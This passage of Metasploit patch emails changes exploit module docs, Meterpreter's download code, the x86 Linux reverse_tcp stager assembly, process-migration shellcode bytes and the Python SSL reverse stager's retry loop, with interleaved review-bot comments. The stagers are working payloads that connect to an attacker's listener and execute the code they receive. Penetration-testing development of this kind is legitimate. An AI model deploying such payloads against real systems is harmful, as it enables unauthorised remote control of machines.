+++ b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md @@ -1,4 +1,5 @@ -Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal. +Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. +The module exploits this vulnerability to remotely extract Administrator password for the device management portal. Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases. @@ -9,7 +10,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin diff --git a/documentation/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.md b/documentation/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.md index 2a525fb316..b7fbd69b40 100755 --- a/documentation/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.md +++ b/documentation/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.md @@ -11,7 +11,8 @@ This module dumps memory contents using a crafted Range header and affects only 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios + ``` msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump msf auxiliary(ms15_034_http_sys_memory_dump) > set RHOSTS 10.1.1.125 diff --git a/documentation/modules/auxiliary/scanner/http/owa_ews_login.md b/documentation/modules/auxiliary/scanner/http/owa_ews_login.md index 383fede571..5c4e71880e 100644 --- a/documentation/modules/auxiliary/scanner/http/owa_ews_login.md +++ b/documentation/modules/auxiliary/scanner/http/owa_ews_login.md 
@@ -1,4 +1,5 @@ -This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. It is typically faster than the traditional form-based OWA login method. +This module is for password guessing against OWA's EWS service which often exposes NTLM authentication over HTTPS. +It is typically faster than the traditional form-based OWA login method. ## Verification Steps @@ -7,7 +8,7 @@ This module is for password guessing against OWA's EWS service which often expos 3. Set TARGETURI if necessary. 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf auxiliary(owa_ews_login) > run diff --git a/documentation/modules/auxiliary/scanner/http/robots_txt.md b/documentation/modules/auxiliary/scanner/http/robots_txt.md index 4161a04914..f830e1b696 100644 --- a/documentation/modules/auxiliary/scanner/http/robots_txt.md +++ b/documentation/modules/auxiliary/scanner/http/robots_txt.md @@ -25,7 +25,8 @@ is extremely common. You can set the test path where the scanner will try to find `robots.txt` file. Default is `/` -## Sample Output +## Scenarios + ``` msf> use auxiliary/scanner/http/robots_txt msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238 diff --git a/documentation/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.md b/documentation/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.md index 1c5101c640..c8943fdc43 100644 --- a/documentation/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.md +++ b/documentation/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.md @@ -9,7 +9,7 @@ The vulnerability is due to insufficient condition checks in the part of the cod 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf auxiliary(cisco_ike_benigncertain) > show options diff --git a/documentation/modules/auxiliary/scanner/snmp/cambium_snmp_loot.md b/documentation/modules/auxiliary/scanner/snmp/cambium_snmp_loot.md index 33cc276ae5..313c4e82d9 100644 
--- a/documentation/modules/auxiliary/scanner/snmp/cambium_snmp_loot.md +++ b/documentation/modules/auxiliary/scanner/snmp/cambium_snmp_loot.md @@ -1,6 +1,8 @@ -Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation. +Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. +This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation. -The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units. +The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. +The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units. Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows: @@ -16,7 +18,7 @@ snmpget -v2c -c public 1.3.3.7 1.3.6.1.4.1.17713.21.6.4.13.0 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/snmp/epmp_snmp_loot 
diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index ac392d61ae..d4d8f3d801 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -17,7 +17,7 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability, 3. Do: ```set URIPATH / [PATH]``` 4. Do: ```run``` -## Sample Output +## Scenarios ### IE 11 and Flash 18.0.0.194 diff --git a/documentation/modules/exploit/multi/http/axis2_deployer.md b/documentation/modules/exploit/multi/http/axis2_deployer.md index ac68a1fcb6..f03e1fd59e 100755 --- a/documentation/modules/exploit/multi/http/axis2_deployer.md +++ b/documentation/modules/exploit/multi/http/axis2_deployer.md @@ -17,7 +17,7 @@ The Apache Axis2 Web application has three main sections:'Services' lists all th 4. Do: ```set PASSWORD [Password]``` 5. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use exploit/multi/http/axis2_deployer @@ -57,6 +57,4 @@ Meterpreter : java/java meterpreter > exit [*] Shutting down Meterpreter... -[*] 10.10.155.37 - Meterpreter session 3 closed. Reason: User exit - ``` diff --git a/documentation/modules/exploit/multi/http/glassfish_deployer.md b/documentation/modules/exploit/multi/http/glassfish_deployer.md index 617f0edfc8..a0a3bf07d2 100644 --- a/documentation/modules/exploit/multi/http/glassfish_deployer.md +++ b/documentation/modules/exploit/multi/http/glassfish_deployer.md @@ -34,7 +34,7 @@ If you are on a different platform (such as Windows), the installation should be 4. Do: ```set PASSWORD [Password]``` 5. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use exploit/multi/http/glassfish_deployer 
diff --git a/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md index 0bcc85970c..700dd3ba31 100644 --- a/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md +++ b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md @@ -1,6 +1,7 @@ ## Vulnerable Application - Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. A fix for this issue is included in MediaWiki version 1.28.2 and version 1.27.3. + Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. + A fix for this issue is included in MediaWiki version 1.28.2 and version 1.27.3. ## Vulnerable Setup @@ -47,7 +48,7 @@ To set up the vulnerable environment, please do: In case the wiki is configured as private, a read-only (or better) account is needed to exploit this issue. Provide the password of that account here. -## Sample Output +## Scenarios ### The Check command diff --git a/documentation/modules/exploit/multi/http/rails_web_console_v2_code_exec.md b/documentation/modules/exploit/multi/http/rails_web_console_v2_code_exec.md index cac6edc4e2..e9702c0e83 100644 --- a/documentation/modules/exploit/multi/http/rails_web_console_v2_code_exec.md +++ b/documentation/modules/exploit/multi/http/rails_web_console_v2_code_exec.md 
@@ -1,6 +1,7 @@ ## Description - This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range. + This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x. + This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range. ## Verification Steps @@ -13,8 +14,6 @@ cd taco vim config/environments/development.rb ``` - - Add the following line just before the final `end` tag: ```config.web_console.whitelisted_ips = %w(0.0.0.0/0)``` @@ -38,7 +37,7 @@ sudo apt-get install nodejs 3. Do: ```set RPORT [Port]``` 4. Do: ```run``` -## Sample Output +## Scenarios ### Rails version 4.2.6 diff --git a/documentation/modules/exploit/windows/http/manageengine_connectionid_write.md b/documentation/modules/exploit/windows/http/manageengine_connectionid_write.md index 12f4641c6f..5690903d7d 100644 --- a/documentation/modules/exploit/windows/http/manageengine_connectionid_write.md +++ b/documentation/modules/exploit/windows/http/manageengine_connectionid_write.md 
@@ -1,6 +1,7 @@ ## Description -This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. This exploit was successfully tested on version 9, build 90109 and build 91084. +This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. +This exploit was successfully tested on version 9, build 90109 and build 91084. **NOTE:** By default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file `rdslog0.txt`. @@ -21,7 +22,7 @@ Desktop Central is integrated desktop and mobile device management software that 3. Do: ```check``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` $ msfconsole diff --git a/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md b/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md index 9dedf7b430..b170d08d68 100644 --- a/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md +++ b/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md 
@@ -30,7 +30,7 @@ 4. Do: `run` 5. You should get a session -## Sample Output +## Scenarios ``` msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec diff --git a/documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md b/documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md index a90093995c..cc328a60ca 100755 --- a/documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md +++ b/documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md @@ -21,7 +21,7 @@ Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hyperte 3. Do: ```set PATH / [PATH]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use exploit/windows/iis/iis_webdav_upload_asp From 4eb86cae99873750164ab61953eb9dcedbd10088 Mon Sep 17 00:00:00 2001 From: h00die Date: Wed, 31 May 2017 21:22:44 -0400 Subject: [PATCH 15/38] add L3 header for version under scenarios --- documentation/modules/module_doc_template.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/documentation/modules/module_doc_template.md b/documentation/modules/module_doc_template.md index a009033856..6dfc897dde 100644 --- a/documentation/modules/module_doc_template.md +++ b/documentation/modules/module_doc_template.md @@ -27,6 +27,8 @@ functioning in 5+ years, so giving links or specific examples can be VERY helpfu ## Scenarios +### Version of software and OS as applicable + Specific demo of using the module that might be useful in a real world scenario. ``` From cc0ff8f3dbd44e2a678b49161ec3c5f1404eeb67 Mon Sep 17 00:00:00 2001 
From: OJ Date: Fri, 2 Jun 2017 17:16:58 +1000 Subject: [PATCH 16/38] Enable adaptive download with variable block sizes The aim of this commit is to allow users of Meterpreter in high-latency environments have better control over the behaviour of the download function. This code contains two new options that manage the block size of the downloads and the ability to set "adaptive" which means that the block size will adjust on the fly of things continue to fail. --- .../meterpreter/extensions/stdapi/fs/file.rb | 42 +++++++++++++++---- .../console/command_dispatcher/stdapi/fs.rb | 6 +++ 2 files changed, 40 insertions(+), 8 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb index 32eab353db..afe82e1bac 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb @@ -7,6 +7,7 @@ require 'rex/post/meterpreter/extensions/stdapi/stdapi' require 'rex/post/meterpreter/extensions/stdapi/fs/io' require 'rex/post/meterpreter/extensions/stdapi/fs/file_stat' require 'fileutils' +require 'filesize' module Rex module Post @@ -25,6 +26,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO include Rex::Post::File + MIN_BLOCK_SIZE = 1024 + class << self attr_accessor :client end @@ -312,7 +315,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO dest += timestamp end - stat.call('downloading', src, dest) if (stat) + stat.call('Downloading', src, dest) if (stat) result = download_file(dest, src, opts, &stat) stat.call(result, src, dest) if (stat) } @@ -325,8 +328,11 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO continue=false tries=false tries_no=0 + stat ||= lambda { } + if opts continue = true if opts["continue"] + adaptive = true if opts['adaptive'] tries = true if opts["tries"] tries_no = opts["tries_no"] end 
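Review bot: `stat ||= lambda { }` in the `@@ -325,8 +328,11 @@` hunk creates a zero-arity lambda, and Ruby lambdas enforce arity, so every later `stat.call(msg, src_file, dest_file)` raises ArgumentError whenever download_file is called without a block — the case the removed `if (stat)` guards used to tolerate. Use a proc, which ignores surplus arguments: `stat ||= proc { }` (or `lambda { |*| }`). download_file continues in the following hunks, so the unguarded calls are not all visible here. The new `require 'filesize'` in the first hunk also needs the filesize gem declared in the gemspec if it is not already; that is outside this diff.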
@@ -346,6 +352,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO dir = ::File.dirname(dest_file) ::FileUtils.mkdir_p(dir) if dir and not ::File.directory?(dir) + src_size = Filesize.new(src_stat.size).pretty + if continue # continue downloading the file - skip downloaded part in the source dst_fd = ::File.new(dest_file, "ab") @@ -353,10 +361,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO dst_fd.seek(0, ::IO::SEEK_END) in_pos = dst_fd.pos src_fd.seek(in_pos) - stat.call('continuing from ', in_pos, src_file) if (stat) + stat.call("Continuing from #{Filesize.new(in_pos).pretty} of #{src_size}", src_file, dest_file) rescue # if we can't seek, download again - stat.call('error continuing - downloading from scratch', src_file, dest_file) if (stat) + stat.call('Error continuing - downloading from scratch', src_file, dest_file) dst_fd.close dst_fd = ::File.new(dest_file, "wb") end @@ -365,10 +373,12 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO end # Keep transferring until EOF is reached... + block_size = opts['block_size'] || 1024 * 1024 begin if tries # resume when timeouts encountered seek_back = false + adjust_block = false tries_cnt = 0 begin # while begin # exception 
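Review bot: `block_size = opts['block_size'] || 1024 * 1024` in the `@@ -365,10 +373,12 @@` hunk never applies the MIN_BLOCK_SIZE floor that the adaptive path relies on, and because `0` is truthy in Ruby a `-b 0` (or a non-numeric value that `to_i` turned into 0) is handed straight to `src_fd.read(0)` instead of falling back to the default. Clamp it once at the point of use: `block_size = [(opts['block_size'] || 1024 * 1024).to_i, MIN_BLOCK_SIZE].max`. A one-line comment noting that MIN_BLOCK_SIZE is the lower bound for both the initial and the adaptively halved size would also help the next reader. The enclosing download_file starts and ends outside this hunk.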
@@ -376,30 +386,46 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO in_pos = dst_fd.pos src_fd.seek(in_pos) seek_back = false - stat.call('resuming at ', in_pos, src_file) if (stat) + stat.call("Resuming at #{Filesize.new(in_pos).pretty} of #{src_size}", src_file, dest_file) else # succesfully read and wrote - reset the counter tries_cnt = 0 end - data = src_fd.read + adjust_block = true + data = src_fd.read(block_size) + adjust_block = false rescue Rex::TimeoutError # timeout encountered - either seek back and retry or quit if (tries && (tries_no == 0 || tries_cnt < tries_no)) tries_cnt += 1 seek_back = true - stat.call('error downloading - retry #', tries_cnt, src_file) if (stat) + # try a smaller block size for the next round + if adaptive && adjust_block + block_size = [block_size >> 1, MIN_BLOCK_SIZE].max + adjust_block = false + msg = "Error downloading, block size set to #{block_size} - retry # #{tries_cnt}" + stat.call(msg, src_file, dest_file) + else + stat.call("Error downloading - retry # #{tries_cnt}", src_file, dest_file) + end retry else - stat.call('error downloading - giving up', src_file, dest_file) if (stat) + stat.call('Error downloading - giving up', src_file, dest_file) raise end end dst_fd.write(data) if (data != nil) + percent = dst_fd.pos.to_f / src_stat.size.to_f * 100.0 + msg = "Downloaded #{Filesize.new(dst_fd.pos).pretty} of #{src_size} (#{percent.round(2)}%)" + stat.call(msg, src_file, dest_file) end while (data != nil) else # do the simple copying quiting on the first error - while ((data = src_fd.read) != nil) + while ((data = src_fd.read(block_size)) != nil) dst_fd.write(data) + percent = dst_fd.pos.to_f / src_stat.size.to_f * 100.0 + msg = "Downloaded #{Filesize.new(dst_fd.pos).pretty} of #{src_size} (#{percent.round(2)}%)" + stat.call(msg, src_file, dest_file) end end rescue EOFError 
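Review bot: the progress line `percent = dst_fd.pos.to_f / src_stat.size.to_f * 100.0`, duplicated in both branches of the hunk, evaluates `0.0 / 0.0` for an empty source file and prints `NaN%` because Ruby float division does not raise. Guard it, e.g. `percent = src_stat.size.zero? ? 100.0 : dst_fd.pos.to_f / src_stat.size * 100.0`, and pull the three repeated progress lines into one local lambda so the two branches cannot drift apart. Separately, once the adaptive path halves block_size it is never grown back, so a single transient timeout early on pins the rest of a large download at a small block size; if that is intended, say so in a comment next to `block_size = [block_size >> 1, MIN_BLOCK_SIZE].max`. download_file continues past the end of the hunk.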
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb index 508d4820ea..fa855b7fcb 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb @@ -28,6 +28,8 @@ class Console::CommandDispatcher::Stdapi::Fs @@download_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ], "-c" => [ false, "Resume getting a partially-downloaded file." ], + "-a" => [ false, "Enable adaptive download buffer size." ], + "-b" => [ true, "Set the initial block size for the download." ], "-l" => [ true, "Set the limit of retries (0 unlimits)." ], "-r" => [ false, "Download recursively." ], "-t" => [ false, "Timestamp downloaded files." ]) @@ -382,6 +384,10 @@ class Console::CommandDispatcher::Stdapi::Fs @@download_opts.parse(args) { |opt, idx, val| case opt + when "-a" + opts['adaptive'] = true + when "-b" + opts['block_size'] = val.to_i when "-r" recursive = true opts['recursive'] = true From 82a83af6c2647193f70e253979691c5d46bf7353 Mon Sep 17 00:00:00 2001 From: tkmru Date: Sat, 3 Jun 2017 04:04:17 +0900 Subject: [PATCH 17/38] add error handling to x86 linux reverse tcp --- lib/msf/core/payload/linux/reverse_tcp.rb | 85 +++++++++++++---------- 1 file changed, 48 insertions(+), 37 deletions(-) diff --git a/lib/msf/core/payload/linux/reverse_tcp.rb b/lib/msf/core/payload/linux/reverse_tcp.rb index 89e37a8c44..07e8b9354c 100644 --- a/lib/msf/core/payload/linux/reverse_tcp.rb +++ b/lib/msf/core/payload/linux/reverse_tcp.rb 
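Review bot: `opts['block_size'] = val.to_i` silently accepts `-b foo` or `-b 0` (String#to_i returns 0 on garbage) and passes a zero block size down to the download code. Validate at the parse site: `bs = val.to_i; return print_error("Block size must be a positive integer") unless bs > 0; opts['block_size'] = bs`. The `-b` help text should also state the unit, e.g. `"Set the initial block size for the download (bytes)."`. cmd_download continues outside the hunk.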
@@ -91,49 +91,61 @@ module Payload::Linux::ReverseTcp encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first asm = %Q^ - xor ebx, ebx - mul ebx - push ebx - inc ebx - push ebx - push 0x2 - mov al, 0x66 - mov ecx, esp - int 0x80 ; sys_socketcall (socket()) + xor ebx, ebx + mul ebx + push ebx + inc ebx + push ebx + push 0x2 + mov al, 0x66 + mov ecx, esp + int 0x80 ; sys_socketcall (socket()) + test eax, eax + js failed - xchg eax, edi ; store the socket in edi - pop ebx ; set ebx back to zero - push #{encoded_host} - push #{encoded_port} - mov ecx, esp - push 0x66 - pop eax - push eax - push ecx - push edi - mov ecx, esp - inc ebx - int 0x80 ; sys_socketcall (connect()) + xchg eax, edi ; store the socket in edi + pop ebx ; set ebx back to zero + push #{encoded_host} + push #{encoded_port} + mov ecx, esp + push 0x66 + pop eax + push eax + push ecx + push edi + mov ecx, esp + inc ebx + int 0x80 ; sys_socketcall (connect()) + test eax, eax + js failed ^ asm << asm_send_uuid if include_send_uuid asm << %Q^ - mov dl, 0x7 - mov ecx, 0x1000 - mov ebx, esp - shr ebx, 0xc - shl ebx, 0xc - mov al, 0x7d - int 0x80 ; sys_mprotect + mov dl, 0x7 + mov ecx, 0x1000 + mov ebx, esp + shr ebx, 0xc + shl ebx, 0xc + mov al, 0x7d + int 0x80 ; sys_mprotect + test eax, eax + js failed - pop ebx - mov ecx, esp - cdq - mov dh, 0xc - mov al, 0x3 - int 0x80 ; sys_read (recv()) - jmp ecx + pop ebx + mov ecx, esp + cdq + mov dh, 0xc + mov al, 0x3 + int 0x80 ; sys_read (recv()) + test eax, eax + js failed + jmp ecx + failed: + mov eax, 0x1 + mov ebx, 0x1 ; set exit status to 1 + int 0x80 ; sys_exit ^ asm @@ -142,4 +154,3 @@ module Payload::Linux::ReverseTcp end end - From e175bcda08b430db413a13d65f4436a0a1d196cf Mon Sep 17 00:00:00 2001 
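Review bot: after `int 0x80 ; sys_read (recv())` the new `test eax, eax` / `js failed` only catches a negative return; a zero-length read (handler closed the connection before sending a stage) leaves eax = 0 and falls through to `jmp ecx`, executing whatever bytes happen to be on the freshly mprotect'ed stack page. Use `jle failed` there so both errors and EOF exit cleanly. In the `failed:` stub the two `mov reg, imm32` instructions cost 10 bytes; `xor eax, eax` / `inc eax` / `mov ebx, eax` gives the same exit(1) in 5 bytes, which matters for a stager, though any such change means re-bumping the CachedSize values updated in a later commit. The generating method starts outside this hunk.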
From: tkmru Date: Sat, 3 Jun 2017 08:37:18 +0900 Subject: [PATCH 18/38] update cachedSize --- modules/payloads/stagers/linux/x86/reverse_tcp.rb | 2 +- modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 1eb84c5fa6..655f7f4ec9 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/linux/reverse_tcp' module MetasploitModule - CachedSize = 71 + CachedSize = 99 include Msf::Payload::Stager include Msf::Payload::Linux::ReverseTcp diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb index 8dc5b59c43..65fe538a80 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/linux/reverse_tcp' module MetasploitModule - CachedSize = 114 + CachedSize = 142 include Msf::Payload::Stager include Msf::Payload::Linux::ReverseTcp From ca5b20f4d0243cb8c94e36a2cc3776bbcdada339 Mon Sep 17 00:00:00 2001 From: RaMMicHaeL Date: Sat, 3 Jun 2017 11:30:11 +0300 Subject: [PATCH 19/38] Fixed an elusive bug on AMD CPUs Details: http://blog.rewolf.pl/blog/?p=1484 rwfpl/rewolf-wow64ext@8771485 --- external/source/vncdll/vncdll/inject.c | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/external/source/vncdll/vncdll/inject.c b/external/source/vncdll/vncdll/inject.c index 3414584dc6..fc3ea273f5 100755 --- a/external/source/vncdll/vncdll/inject.c +++ b/external/source/vncdll/vncdll/inject.c 
@@ -12,11 +12,14 @@ #endif // see '/msf3/external/source/shellcode/x86/migrate/executex64.asm' +// 03.06.2017: fixed an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484 +// found and fixed by ReWolf, incorporated by RaMMicHaeL BYTE migrate_executex64[] = "\x55\x89\xE5\x56\x57\x8B\x75\x08\x8B\x4D\x0C\xE8\x00\x00\x00\x00" - "\x58\x83\xC0\x25\x83\xEC\x08\x89\xE2\xC7\x42\x04\x33\x00\x00\x00" - "\x89\x02\xE8\x09\x00\x00\x00\x83\xC4\x14\x5F\x5E\x5D\xC2\x08\x00" - "\x8B\x3C\x24\xFF\x2A\x48\x31\xC0\x57\xFF\xD6\x5F\x50\xC7\x44\x24" - "\x04\x23\x00\x00\x00\x89\x3C\x24\xFF\x2C\x24"; + "\x58\x83\xC0\x2B\x83\xEC\x08\x89\xE2\xC7\x42\x04\x33\x00\x00\x00" + "\x89\x02\xE8\x0F\x00\x00\x00\x66\x8C\xD8\x66\x8E\xD0\x83\xC4\x14" + "\x5F\x5E\x5D\xC2\x08\x00\x8B\x3C\xE4\xFF\x2A\x48\x31\xC0\x57\xFF" + "\xD6\x5F\x50\xC7\x44\x24\x04\x23\x00\x00\x00\x89\x3C\x24\xFF\x2C" + "\x24"; // see '/msf3/external/source/shellcode/x64/migrate/remotethread.asm' BYTE migrate_wownativex[] = "\xFC\x48\x89\xCE\x48\x89\xE7\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00" From 39cee481c1203593a6fbce7b2ff3f41628a77943 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 3 Jun 2017 22:57:59 +0530 Subject: [PATCH 20/38] Making changes similar to the reverse_tcp payload --- .../core/payload/python/reverse_tcp_ssl.rb | 24 +++++++++++++++---- .../stagers/python/reverse_tcp_ssl.rb | 2 +- 2 files changed, 20 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index cc11aaf135..6873728a86 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb 
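Review bot: the byte array is hand-patched rather than regenerated from executex64.asm, and one change here is not reflected in the asm commit: `\x8B\x3C\x24` becomes `\x8B\x3C\xE4`, which appears to be an alternate SIB encoding of the same `mov edi, [esp]` (index=none, base=esp) rather than part of the fix. The displacement edits (`0x25`→`0x2B`, `0x09`→`0x0F`) are consistent with the six inserted bytes `66 8C D8 66 8E D0` (`mov ax, ds` / `mov ss, ax`), so the patch looks internally consistent, but please rebuild the array from the assembled .asm so the two stay in sync, and add a comment above it such as `// regenerated from executex64.asm after the AMD SS fix (see blog post above)`. Any other embedded copies of this stub elsewhere in the tree should receive the same update.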
@@ -15,6 +15,15 @@ module Payload::Python::ReverseTcpSsl include Msf::Payload::Python include Msf::Payload::Python::ReverseTcp + def initialize(*args) + super + register_advanced_options([ + OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 10]), + OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts',5]) + ], self.class) + end + + # # Generate the first stage @@ -23,7 +32,8 @@ module Payload::Python::ReverseTcpSsl conf = { port: datastore['LPORT'], host: datastore['LHOST'], - retry_wait: datastore['StagerRetryWait'] + retry_count: datastore['StagerRetryCount'], + retry_wait: datastore['StagerRetryWait'], } generate_reverse_tcp_ssl(conf) @@ -44,22 +54,26 @@ module Payload::Python::ReverseTcpSsl def generate_reverse_tcp_ssl(opts={}) # Set up the socket cmd = "import ssl,socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n" - if datastore['StagerRetryWait'].blank? # do not retry at all (old style) + if opts[:retry_wait].blank? # do not retry at all (old style) cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2 cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n" cmd << "s=ssl.wrap_socket(so)\n" else - cmd << "while 1:\n" + if opts[:retry_count]>0 + cmd << "for x in range(#{opts[:retry_count].to_i}):\n" + else + cmd << "while 1:\n" + end cmd << "\ttry:\n" cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2 cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n" cmd << "\t\ts=ssl.wrap_socket(so)\n" cmd << "\t\tbreak\n" cmd << "\texcept:\n" - if datastore['StagerRetryWait'].to_i <= 0 + if opts[:retry_wait].to_i <= 0 cmd << "\t\tpass\n" # retry immediately else - cmd << "\t\ttime.sleep(#{datastore['StagerRetryWait'].to_i})\n" # retry after waiting + cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting end end cmd << py_send_uuid if include_send_uuid 
